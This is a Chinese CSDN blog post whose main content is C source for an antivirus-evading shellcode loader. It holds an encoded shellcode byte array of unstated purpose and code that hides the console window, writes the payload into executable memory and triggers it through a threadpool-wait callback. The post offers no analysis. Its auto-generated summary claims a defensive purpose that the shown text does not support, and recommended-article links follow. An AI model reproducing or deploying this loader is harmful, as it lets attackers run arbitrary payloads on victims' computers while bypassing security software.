过某绒shellcode加载器

最新推荐文章于 2024-09-16 23:17:14 发布
最新推荐文章于 2024-09-16 23:17:14 发布
阅读量146 收藏 2
点赞数 1
分类专栏: 渗透测试与C/C++开发 文章标签: 网络安全 安全 系统安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiopkd1/article/details/128764353
版权
本文详细解析了某绒shellcode加载器的工作原理及其在网络与系统安全中的应用,揭示了其在web安全领域的潜在威胁。通过对shellcode加载过程的分析,读者将能更好地理解和预防此类安全风险。
摘要由CSDN通过智能技术生成 
#include<stdio.h>
#include<Windows.h>

unsigned char shellcode[] =
"\xb8\xd6\x0d\xd3\xd9\xda\xce\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x61\x31\x42\x15\x83\xc2\x04\x03\x42\x11\xe2\x23\xd4\x1d\x63"
"\xa1\x68\x7c\xd1\xec\x03\x5b\x2e\x53\xc7\x6a\x7f\x30\x26\x38"
"\x97\x45\x8d\xc6\x94\x76\x92\xf8\x2a\xec\xcf\x60\x04\x52\x91"
"\x4e\xe4\xfa\x40\x43\x3f\x7f\x5a\x09\xc3\x29\x53\xa3\xde\xdd"
"\x46\xca\xef\xaf\xb1\x05\x3a\xc7\xf2\xe2\x68\x91\xf5\x5d\xbc"
"\xb0\xe1\x92\xac\x30\x8a\xb0\x66\x7f\x85\x52\x4d\xe0\xf4\x75"
"\xea\x54\xbf\x23\xe8\x7a\xe7\x8c\x4d\x44\x54\x5d\x0f\xd3\x7d"
"\xcf\x8e\xa2\xc3\xb9\x80\xca\x57\x5b\xa8\x1a\xdc\xc4\xee\xc0"
"\x43\xe4\x56\x6c\xaf\xe2\x4d\x89\x2a\x06\x29\xea\x52\x59\x46"
"\x1c\xdb\x2b\xf5\x6d\x02\x02\x94\x46\x88\xb0\x95\x1c\xa2\xed"
"\xeb\x89\xe0\x4c\x79\x64\xe1\x71\x0b\x1c\xf4\x36\x11\xa3\xd5"
"\x2e\xb6\x7e\xdb\x11\xcc\xf5\xa0\x4c\x01\x38\x36\x33\x9f\x2b"
"\x76\x79\x5f\x17\xaa\x5f\x85\x4f\xe9\x52\xe2\x29\x22\x4f\x6d"
"\x2e\xde\x1a\x79\x80\x5f\x85\x9f\x2d\xb1\x82\x63\xc7\x5d\xca"
"\x0d\xf2\xb3\xc7\x48\x48\x50\x10\x2c\x20\x3a\xba\x53\xc5\xb2"
"\x5d\xfc\x6d\xca\x60\x99\x8b\xca\x34\xb6\xec\x01\x69\xf9\x80"
"\x7f\x2a\xed\x64\xc7\xcb\x24\x47\x36\xd9\x2f\xc7\x37\x52\x69"
"\x72\x97\x07\x9c\xfe\xa0\x1c\x01\xd1\xed\x25\xb8\x93\x60\xce"
"\x1b\x46\xc6\xfa\xa8\x39\x68\x5f\xfa\x0e\x59\x5d\xd5\x77\xc6"
"\xcc\xf8\x44\x48\x08\x96\xd5\xa1\x59\xdc\x16\xbf\x65\xcf\x9d"
"\x8f\x83\xd7\xe1\xb3\x25\x7d\xee\x2a\x50\xd1\x68\x29\x31\x20"
"\x71\xba\xdd\x96\xad\x8c\x64\x48\x0e\xf6\x42\x0d\x39\x12\xbb"
"\xc9\x72\xe6\x3e\x39\x96\x95\x8e\x1f\x27\xcd\x6d\x5b\xc8\x54"
"\xc1\x50\x23\x9b\x2e\x92\xd8\xb1\x5c\x0d\x67\x5d\x36\x20\x9f"
"\xce\x1c\x65\xf1\x6c\xcc\x8a\x73\xe0\x30\xf3\x2c\x98\x49\x85"
"\x88\x6e\x3a\x2a\xba\xdb\x06\xde\x3b\x16\x39\x3d\x56\x53\x3e"
"\xec\x86\xa5\xc8\x3f\x4d\x85\x23\xef";

int main()
{
    HWND hDos; //声明窗口句柄变量

    hDos = GetForegroundWindow(); //得到窗口句柄

    ShowWindow(hDos, SW_HIDE); //隐藏窗口
    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
    Sleep(100);
    LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(shellcodeAddress, shellcode, sizeof(shellcode));
    Sleep(100);
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
    SetThreadpoolWait(threadPoolWait, event, NULL);
    Sleep(1000);
    WaitForSingleObject(event, INFINITE);
    return 0;
}

啊哈灬再现江湖
关注
专栏目录
第15节 编写shellcode加载
imbyter师哥的博客
05-14 382
我最近在做一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。我们编写一个最简单的shellcode加载工具,应用于将本地的shellcode文件执行起来。一个人走得再快,不如一群人走得更远!
python--------pyqt5写给自己对象的~~记录
边儒
05-24 1665
from PyQt5 import QtCore, QtGui, QtWidgets import sys, time,os import qtawesome from PyQt5.QtWidgets import * from PyQt5.QtCore import * from PyQt5.QtGui import * # 图片二进制化 image = b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\xc8\x00\x00\x00\xc8\x08\.
c++ 跳转到上级目录_Windows漏洞利用开发 第4部分:使用跳转定位Shellcode 模块
weixin_28849465的博客
12-08 523
概观在第2和第3部分中,我们构建并改进了ASX To MP3转换的一个漏洞利用。尽管它存在缺陷,但就漏洞而言,它非常简单直接—— 直接利用指向我们shellcode的寄存从而直接跳转到EIP覆盖。事情并不总是那么容易。通常你必须做更多的工作来让应用程序执行到你的shellcode。在本系列的这一部分中,我们将研究如何在漏洞利用中使用跳转代码。具体来说,我们将看看如何操作寄存和栈,并...
shellcode免杀之VirtualAlloc函数加载shellcode过杀软
orange777
02-27 1019
go语言木马免杀
shellcode加载
goat_2003的博客
09-10 1613
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
基于Java实现的Shellcode加载源码+项目说明.zip
12-29
基于Java实现的Shellcode加载源码+项目说明.zip基于Java实现的Shellcode加载源码+项目说明.zip基于Java实现的Shellcode加载源码+项目说明.zip基于Java实现的Shellcode加载源码+项目说明.zip
基于Java实现的Shellcode加载
07-16
【作品名称】:基于Java实现的Shellcode加载 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: ava ShellCode Loader...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1394
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
【双语新闻】AGI安全与对齐,DeepMind近期工作
qq_29883477的博客
09-13 994
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1150
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【农信网-注册/登录安全分析报告】
最新发布
09-16 699
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
无限边界:现代整合安全如何保护云
网络研究观
09-15 777
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在云端还是在本地),让您能够看到无限周界的边缘。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 524
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1765
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务之间安全地传输数据
3286、穿越网格图的安全路径
Lenyiin
09-16 380
这个问题可以通过图的最短路径算法来解决。我们需要使用一个动态规划 (DP) 方法来记录从起点到每个位置所需的最小健康值。在这个问题中,我们可以将 DP 结合 DFS 来实现。这个解法结合了 DFS 和动态规划,通过在矩阵中维护最小健康值来确保从起点到终点的路径在健康值条件下是可行的。你可以在矩形中往上下左右相邻格子移动,但前提是你的健康值始终是。的,会使你的健康值减少 1。如果你可以到达最终的格子,请你返回。,当你在最终格子的时候,你的健康值也必须为。你开始于矩形的左上角。,你的目标是矩形的右下角。
稀土阻燃剂:电子设备的安全守护者
Kingcela1的博客
09-11 664
稀土阻燃剂在电子设备中的应用主要是通过提升材料的阻燃性能、热稳定性和环保安全性,来满足现代电子产品对高性能和安全性的需求。随着技术的不断进步,稀土阻燃剂在电子设备领域的应用前景将会更加广阔。
python shellcode加载
09-19
Python shellcode加载是一种用Python编写的程序,用于加载和执行Shellcode(一段机码,通常用于执行系统级操作)的工具。Shellcode加载通常用于渗透测试、恶意软件开发或安全研究等领域。 Python shellcode...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊哈灬再现江湖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值